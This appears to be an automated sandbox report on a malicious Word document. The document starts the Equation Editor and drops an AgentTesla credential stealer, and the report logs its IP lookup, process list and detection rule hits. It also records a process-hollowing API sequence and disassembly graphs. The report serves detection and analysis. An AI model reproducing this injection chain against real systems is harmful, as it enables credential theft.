                                                            Data Ascii: sz(r-p(|r-poc((*(*~-rCp(*os~*~**j(rp~otH*j(rp~otH*j(rp~otH*~*Frpot[*6rpo*Fr


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249164172.67.74.1524433468C:\Users\user\AppData\Roaming\winiti.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-26 04:39:14 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2024-07-26 04:39:14 UTC211INHTTP/1.1 200 OK
                                                            Date: Fri, 26 Jul 2024 04:39:14 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 11
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 8a91b46a58ff5e7e-EWR
                                                            2024-07-26 04:39:14 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                            Data Ascii: 8.46.123.33


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:00:39:03
                                                            Start date:26/07/2024
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13fc50000
                                                            File size:1'423'704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:00:39:05
                                                            Start date:26/07/2024
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543'304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:00:39:08
                                                            Start date:26/07/2024
                                                            Path:C:\Users\user\AppData\Roaming\winiti.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                                                            Imagebase:0x1a0000
                                                            File size:671'744 bytes
                                                            MD5 hash:3D33CBDE84D0A1197EC0D459D634473E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:00:39:11
                                                            Start date:26/07/2024
                                                            Path:C:\Users\user\AppData\Roaming\winiti.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                                                            Imagebase:0x1a0000
                                                            File size:671'744 bytes
                                                            MD5 hash:3D33CBDE84D0A1197EC0D459D634473E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:00:39:27
                                                            Start date:26/07/2024
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543'304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:14.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:97
                                                              Total number of Limit Nodes:1
                                                              execution_graph 8566 19f49f 8567 19f4da 8566->8567 8570 5b0220 8567->8570 8571 5b023a 8570->8571 8586 5b09bc 8571->8586 8591 5b09fc 8571->8591 8596 5b081d 8571->8596 8600 5b105a 8571->8600 8604 5b0766 8571->8604 8609 5b0a23 8571->8609 8614 5b0fad 8571->8614 8620 5b088e 8571->8620 8628 5b086a 8571->8628 8632 5b098b 8571->8632 8637 5b08eb 8571->8637 8642 5b0735 8571->8642 8647 5b0632 8571->8647 8572 19f4ea 8587 5b09b1 8586->8587 8588 5b1094 8587->8588 8652 19ebd8 8587->8652 8656 19ebd1 8587->8656 8592 5b09b1 8591->8592 8593 5b1094 8592->8593 8594 19ebd8 ReadProcessMemory 8592->8594 8595 19ebd1 ReadProcessMemory 8592->8595 8594->8593 8595->8593 8660 19ea78 8596->8660 8664 19ea70 8596->8664 8597 5b084b 8597->8572 8597->8597 8602 19ebd8 ReadProcessMemory 8600->8602 8603 19ebd1 ReadProcessMemory 8600->8603 8601 5b1094 8602->8601 8603->8601 8605 5b08c9 8604->8605 8607 19ea78 WriteProcessMemory 8605->8607 8608 19ea70 WriteProcessMemory 8605->8608 8606 5b076b 8606->8572 8607->8606 8608->8606 8610 5b09b1 8609->8610 8611 5b1094 8610->8611 8612 19ebd8 ReadProcessMemory 8610->8612 8613 19ebd1 ReadProcessMemory 8610->8613 8612->8611 8613->8611 8615 5b0fb0 8614->8615 8616 5b1021 8614->8616 8617 5b1094 8616->8617 8618 19ebd8 ReadProcessMemory 8616->8618 8619 19ebd1 ReadProcessMemory 8616->8619 8618->8617 8619->8617 8621 5b083b 8620->8621 8622 5b089b 8620->8622 8624 5b084b 8621->8624 8625 19ea78 WriteProcessMemory 8621->8625 8626 19ea70 WriteProcessMemory 8621->8626 8623 5b08b4 8622->8623 8668 5b12a8 8622->8668 8624->8572 8624->8624 8625->8624 8626->8624 8629 5b0898 8628->8629 8631 5b12a8 2 API calls 8629->8631 8630 5b08b4 8631->8630 8633 5b0991 8632->8633 8634 5b1094 8633->8634 8635 19ebd8 ReadProcessMemory 8633->8635 8636 19ebd1 ReadProcessMemory 8633->8636 8635->8634 8636->8634 8638 5b0d77 8637->8638 8681 19e818 8638->8681 8685 19e820 8638->8685 8639 5b0d92 8643 5b0bc3 8642->8643 8645 19ea78 WriteProcessMemory 8643->8645 8646 19ea70 WriteProcessMemory 8643->8646 8644 5b071d 8645->8644 8646->8644 8648 5b065e 8647->8648 8689 19ee10 8648->8689 8693 19ee05 8648->8693 8653 19ec24 ReadProcessMemory 8652->8653 8655 19eca2 8653->8655 8655->8588 8657 19ec24 ReadProcessMemory 8656->8657 8659 19eca2 8657->8659 8659->8588 8661 19eac4 WriteProcessMemory 8660->8661 8663 19eb63 8661->8663 8663->8597 8665 19ea74 WriteProcessMemory 8664->8665 8667 19eb63 8665->8667 8667->8597 8669 5b12bd 8668->8669 8673 19e950 8669->8673 8677 19e948 8669->8677 8670 5b12dc 8670->8623 8674 19e994 VirtualAllocEx 8673->8674 8676 19ea12 8674->8676 8676->8670 8678 19e994 VirtualAllocEx 8677->8678 8680 19ea12 8678->8680 8680->8670 8682 19e81c Wow64SetThreadContext 8681->8682 8684 19e8e7 8682->8684 8684->8639 8686 19e869 Wow64SetThreadContext 8685->8686 8688 19e8e7 8686->8688 8688->8639 8690 19ee97 CreateProcessA 8689->8690 8692 19f0f5 8690->8692 8692->8692 8694 19ee97 CreateProcessA 8693->8694 8696 19f0f5 8694->8696 8697 19e730 8698 19e774 ResumeThread 8697->8698 8700 19e7c6 8698->8700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 190508-1913a5 call 190d7c call 190d8c call 190d9c call 190dac * 2 call 190dbc * 2 call 190dcc * 5 58 1913ab-1913b1 0->58 59 1914bf-191803 call 190dcc * 3 call 190ddc * 2 call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e3c call 190dec call 190e0c call 190e4c call 190e1c call 190e2c 0->59 60 1913b4-1913e9 58->60 120 19181b-191829 59->120 121 191805-19180b 59->121 61 1913ef-191424 60->61 62 1931e7-1931ff 60->62 61->62 64 19142a-19144e 61->64 64->62 67 191454-19146f 64->67 69 191478-191489 67->69 70 191471-191477 67->70 73 19148b-191491 69->73 74 191492-1914b9 69->74 70->69 73->74 74->59 74->60 120->62 125 19182f-1918a0 call 190e5c 120->125 122 19180d 121->122 123 19180f-191811 121->123 122->120 123->120 132 1918a6-1931e6 call 190e6c call 190e7c call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190e9c call 190eac call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190e9c call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e9c call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190edc call 190eec call 190efc call 190f0c * 14 call 190f1c call 190f2c call 190f3c call 190f4c call 190e0c call 1906f8 call 190f5c call 190f6c call 190f5c call 190f6c 125->132
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $&$($($-$7$7$7$C$Ppp$Q$_$_$_$_$_$_$_$_$d$d$g$i$k$k$k$k$k$k$k$k
                                                              • API String ID: 0-3360338523
                                                              • Opcode ID: eeb13e85c0ef51da30507e93522d83ee96b22dde3696adf283c5018134da68d7
                                                              • Instruction ID: 22a7f08a5953e68e8d2bccd3807c6d1ee79d11fb0b70aedfb7be348e9981031d
                                                              • Opcode Fuzzy Hash: eeb13e85c0ef51da30507e93522d83ee96b22dde3696adf283c5018134da68d7
                                                              • Instruction Fuzzy Hash: F9132930A10715CFCB26EF74C894B99B7B2BF99300F508A99E449AB351DB71AE85CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 485 19117e-1911f9 call 190d7c 494 191203-191207 call 190d8c 485->494 496 19120c-1913a5 call 190d9c call 190dac * 2 call 190dbc * 2 call 190dcc * 5 494->496 542 1913ab-1913b1 496->542 543 1914bf-1917e1 call 190dcc * 3 call 190ddc * 2 call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e3c call 190dec call 190e0c call 190e4c call 190e1c call 190e2c 496->543 544 1913b4-1913e9 542->544 602 1917e8-1917f9 543->602 545 1913ef-191424 544->545 546 1931e7-1931ff 544->546 545->546 548 19142a-19144e 545->548 548->546 551 191454-19146f 548->551 553 191478-191489 551->553 554 191471-191477 551->554 557 19148b-191491 553->557 558 191492-1914b9 553->558 554->553 557->558 558->543 558->544 603 191801-191803 602->603 604 19181b-19181f 603->604 605 191805-19180b 603->605 608 191825-191829 604->608 606 19180d 605->606 607 19180f-191811 605->607 606->604 607->604 608->546 609 19182f-191878 call 190e5c 608->609 615 191882-1918a0 609->615 616 1918a6-1931e6 call 190e6c call 190e7c call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190e9c call 190eac call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190e9c call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e9c call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190ebc call 190dec call 190dfc call 190e0c call 190e1c call 190e2c call 190e8c call 190ecc call 190eac call 190edc call 190eec call 190efc call 190f0c * 14 call 190f1c call 190f2c call 190f3c call 190f4c call 190e0c call 1906f8 call 190f5c call 190f6c call 190f5c call 190f6c 615->616
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $&$($($-$7$7$7$C$Ppp$Q$_$_$_$_$_$_$_$_$d$d$g$i$k$k$k$k$k$k$k$k
                                                              • API String ID: 0-3360338523
                                                              • Opcode ID: 4ba9fe2c9c28a868ffdb1c3aeadcb32295c2417a27b0aca4d9204d57a89cf28e
                                                              • Instruction ID: 195c45f6bbaddc9eaec797f015495bd9c0bd6acc34e2e3a4f83899b0b467ac4d
                                                              • Opcode Fuzzy Hash: 4ba9fe2c9c28a868ffdb1c3aeadcb32295c2417a27b0aca4d9204d57a89cf28e
                                                              • Instruction Fuzzy Hash: 7D131930A10715CFCB26EF74C894B99B7B2BF99300F508A99E4496B361DB71AE85CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1049 19ee05-19eea9 1051 19eeab-19eec2 1049->1051 1052 19eef2-19ef1a 1049->1052 1051->1052 1057 19eec4-19eec9 1051->1057 1055 19ef1c-19ef30 1052->1055 1056 19ef60-19efb6 1052->1056 1055->1056 1066 19ef32-19ef37 1055->1066 1064 19efb8-19efcc 1056->1064 1065 19effc-19f0f3 CreateProcessA 1056->1065 1058 19eecb-19eed5 1057->1058 1059 19eeec-19eeef 1057->1059 1061 19eed9-19eee8 1058->1061 1062 19eed7 1058->1062 1059->1052 1061->1061 1067 19eeea 1061->1067 1062->1061 1064->1065 1074 19efce-19efd3 1064->1074 1085 19f0fc-19f1c1 1065->1085 1086 19f0f5-19f0fb 1065->1086 1068 19ef39-19ef43 1066->1068 1069 19ef5a-19ef5d 1066->1069 1067->1059 1071 19ef45 1068->1071 1072 19ef47-19ef56 1068->1072 1069->1056 1071->1072 1072->1072 1075 19ef58 1072->1075 1076 19efd5-19efdf 1074->1076 1077 19eff6-19eff9 1074->1077 1075->1069 1079 19efe1 1076->1079 1080 19efe3-19eff2 1076->1080 1077->1065 1079->1080 1080->1080 1081 19eff4 1080->1081 1081->1077 1097 19f1dd-19f1de 1085->1097 1086->1085 1098 19f1b8-19f1c1 1097->1098 1099 19f1e0-19f1e1 1097->1099 1098->1097 1100 19f1f1-19f1f5 1099->1100 1101 19f1e3-19f1e7 1099->1101 1103 19f205-19f209 1100->1103 1104 19f1f7-19f1fb 1100->1104 1101->1100 1102 19f1e9 1101->1102 1102->1100 1105 19f219-19f21d 1103->1105 1106 19f20b-19f20f 1103->1106 1104->1103 1107 19f1fd 1104->1107 1109 19f21f-19f248 1105->1109 1110 19f253-19f25e 1105->1110 1106->1105 1108 19f211 1106->1108 1107->1103 1108->1105 1109->1110 1114 19f25f 1110->1114 1114->1114
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019F0D7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 76c0206a4b3b96db36563bb4af8e365d2b24e3846d161eda07c5b8f169c436b5
                                                              • Instruction ID: c5d28028bafc11bccd779d945f1a08f7d4b9d82496c72afc7e0709da20e0b60b
                                                              • Opcode Fuzzy Hash: 76c0206a4b3b96db36563bb4af8e365d2b24e3846d161eda07c5b8f169c436b5
                                                              • Instruction Fuzzy Hash: 60C12671D002699FDF24CFA8C845BEDBBB1BF09300F1495AAE819B7250DB749A85CF94

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1115 19ee10-19eea9 1117 19eeab-19eec2 1115->1117 1118 19eef2-19ef1a 1115->1118 1117->1118 1123 19eec4-19eec9 1117->1123 1121 19ef1c-19ef30 1118->1121 1122 19ef60-19efb6 1118->1122 1121->1122 1132 19ef32-19ef37 1121->1132 1130 19efb8-19efcc 1122->1130 1131 19effc-19f0f3 CreateProcessA 1122->1131 1124 19eecb-19eed5 1123->1124 1125 19eeec-19eeef 1123->1125 1127 19eed9-19eee8 1124->1127 1128 19eed7 1124->1128 1125->1118 1127->1127 1133 19eeea 1127->1133 1128->1127 1130->1131 1140 19efce-19efd3 1130->1140 1151 19f0fc-19f1c1 1131->1151 1152 19f0f5-19f0fb 1131->1152 1134 19ef39-19ef43 1132->1134 1135 19ef5a-19ef5d 1132->1135 1133->1125 1137 19ef45 1134->1137 1138 19ef47-19ef56 1134->1138 1135->1122 1137->1138 1138->1138 1141 19ef58 1138->1141 1142 19efd5-19efdf 1140->1142 1143 19eff6-19eff9 1140->1143 1141->1135 1145 19efe1 1142->1145 1146 19efe3-19eff2 1142->1146 1143->1131 1145->1146 1146->1146 1147 19eff4 1146->1147 1147->1143 1163 19f1dd-19f1de 1151->1163 1152->1151 1164 19f1b8-19f1c1 1163->1164 1165 19f1e0-19f1e1 1163->1165 1164->1163 1166 19f1f1-19f1f5 1165->1166 1167 19f1e3-19f1e7 1165->1167 1169 19f205-19f209 1166->1169 1170 19f1f7-19f1fb 1166->1170 1167->1166 1168 19f1e9 1167->1168 1168->1166 1171 19f219-19f21d 1169->1171 1172 19f20b-19f20f 1169->1172 1170->1169 1173 19f1fd 1170->1173 1175 19f21f-19f248 1171->1175 1176 19f253-19f25e 1171->1176 1172->1171 1174 19f211 1172->1174 1173->1169 1174->1171 1175->1176 1180 19f25f 1176->1180 1180->1180
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0019F0D7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 251af293f03a18269dd0283f51c9845fba83799244a483a6294a100bf6cb7caa
                                                              • Instruction ID: 92e37e067fef0a3abcf201d16e0e28fa0c59dfeb0c96768c458ea63cf7c58026
                                                              • Opcode Fuzzy Hash: 251af293f03a18269dd0283f51c9845fba83799244a483a6294a100bf6cb7caa
                                                              • Instruction Fuzzy Hash: C7C12771D002299FDF24CFA8C845BEDBBB1BF09304F1095AAD819B7250DB749A85CF94

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1181 19ea70-19eae3 1185 19eafa-19eb61 WriteProcessMemory 1181->1185 1186 19eae5-19eaf7 1181->1186 1188 19eb6a-19ebbc 1185->1188 1189 19eb63-19eb69 1185->1189 1186->1185 1189->1188
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EB4B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 6504cf33d6d0cdd04d91da2043b1a882e3e4fb4e13ae37e90d6679b8af5aeae7
                                                              • Instruction ID: 2810a6313dc21392f8705acd17258218503b0ed0db6d83f580a93160d6facec7
                                                              • Opcode Fuzzy Hash: 6504cf33d6d0cdd04d91da2043b1a882e3e4fb4e13ae37e90d6679b8af5aeae7
                                                              • Instruction Fuzzy Hash: 3941B9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815BB210D335AA45CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1194 19ea78-19eae3 1196 19eafa-19eb61 WriteProcessMemory 1194->1196 1197 19eae5-19eaf7 1194->1197 1199 19eb6a-19ebbc 1196->1199 1200 19eb63-19eb69 1196->1200 1197->1196 1200->1199
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EB4B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: f70c1a74b562b508531a0b4c36993c4f4d6281f7810872f1147272910d99bd96
                                                              • Instruction ID: f76834834fb29d05d12a142b2dcdd4d69ad0e047e9de38700700ee2505ead118
                                                              • Opcode Fuzzy Hash: f70c1a74b562b508531a0b4c36993c4f4d6281f7810872f1147272910d99bd96
                                                              • Instruction Fuzzy Hash: 6141A9B4D002589FCF10CFA9D984AEEFBF1BB49314F24942AE815BB250D334AA45CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1205 19ebd1-19eca0 ReadProcessMemory 1208 19eca9-19ecfb 1205->1208 1209 19eca2-19eca8 1205->1209 1209->1208
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EC8A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: f8ad8524c380b6c320c8c996c5d9ccc7250e41319131780d6c101742c2836571
                                                              • Instruction ID: 1086eae62cf71a0d4133623d744ae37aac5bb3ecfa64b15fc4ca04bd2de3bef1
                                                              • Opcode Fuzzy Hash: f8ad8524c380b6c320c8c996c5d9ccc7250e41319131780d6c101742c2836571
                                                              • Instruction Fuzzy Hash: 0441B9B8D002589FCF10CFAAD984AEEFBB1BF49314F24942AE815B7240C735A945CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1214 19ebd8-19eca0 ReadProcessMemory 1217 19eca9-19ecfb 1214->1217 1218 19eca2-19eca8 1214->1218 1218->1217
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0019EC8A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 9da377a04fe8c60ec779fd092aba985c6f1018c12fb001bdab6edd33b4a8f28a
                                                              • Instruction ID: 3341815131016006d42dde8a965556a762567b32123837d7a1f2d212a36d8f55
                                                              • Opcode Fuzzy Hash: 9da377a04fe8c60ec779fd092aba985c6f1018c12fb001bdab6edd33b4a8f28a
                                                              • Instruction Fuzzy Hash: AA41AAB5D002589FCF10CFAAD984AEEFBB1BF49314F20942AE815B7200D735A945CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1223 19e948-19ea10 VirtualAllocEx 1226 19ea19-19ea63 1223->1226 1227 19ea12-19ea18 1223->1227 1227->1226
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019E9FA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 6ba2b2c8a772dd74399051af84fbec09df423bd5bad4b090e89b7073b4b02daa
                                                              • Instruction ID: 608f30b0d2654cc4992c9dc5368d1e61e8e2078e7004b9a8dd2bd73d1955f529
                                                              • Opcode Fuzzy Hash: 6ba2b2c8a772dd74399051af84fbec09df423bd5bad4b090e89b7073b4b02daa
                                                              • Instruction Fuzzy Hash: 0441AAB8D002589FCF10CFA9D984AEEFBB1BB49314F20941AE815BB314D735A946CF64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1232 19e950-19ea10 VirtualAllocEx 1235 19ea19-19ea63 1232->1235 1236 19ea12-19ea18 1232->1236 1236->1235
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0019E9FA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2a73d6dc2e08c1d0ffa1ad59a51c35bfa6f5a30a6d47ee48a5ef61eabc2285ab
                                                              • Instruction ID: 87d2bf255cb95b1416c9a30a2f94ede05fc9916d80f0e8ccc18294c73fcab035
                                                              • Opcode Fuzzy Hash: 2a73d6dc2e08c1d0ffa1ad59a51c35bfa6f5a30a6d47ee48a5ef61eabc2285ab
                                                              • Instruction Fuzzy Hash: A84199B8D002589BCF10CFA9D984AAEFBB1BB49314F20942AE815B7314D735A945CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1241 19e818-19e880 1244 19e882-19e894 1241->1244 1245 19e897-19e8e5 Wow64SetThreadContext 1241->1245 1244->1245 1247 19e8ee-19e93a 1245->1247 1248 19e8e7-19e8ed 1245->1248 1248->1247
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0019E8CF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 64c58465b9d605ef3f44dc1b4337c736a4cfc9bee6d980105a32298e09208be9
                                                              • Instruction ID: bc55ce25c9be89136c3321b9aec4b12fc3533a2aaa0c636aa49ec762d6b7c650
                                                              • Opcode Fuzzy Hash: 64c58465b9d605ef3f44dc1b4337c736a4cfc9bee6d980105a32298e09208be9
